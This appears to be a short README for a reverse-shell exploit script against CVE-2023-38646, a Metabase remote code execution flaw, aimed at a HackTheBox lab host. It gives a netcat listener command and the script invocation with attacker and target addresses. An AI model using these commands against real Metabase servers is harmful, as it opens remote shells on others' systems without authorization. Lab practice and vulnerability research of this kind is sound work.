⚠️ For educational and authorized security research purposes only

Very grateful to the original PoC author securezeron

1. Set Up the Listener on your attacker machine:

   nc -nlvp 4444

2. Then, run this command:

   python3 CVE-2023-38646-Reverse-Shell.py -h
   python3 CVE-2023-38646-Reverse-Shell.py --rhost http://data.analytical.htb/ --lhost 10.10.16.8 --lport 4444

   

• https://nvd.nist.gov/vuln/detail/CVE-2023-38646
• https://medium.com/@starlox.riju123/hackthebox-analytics-metabase-rce-bd3421cba76d
• https://www.youtube.com/watch?v=br7JZzcTDG0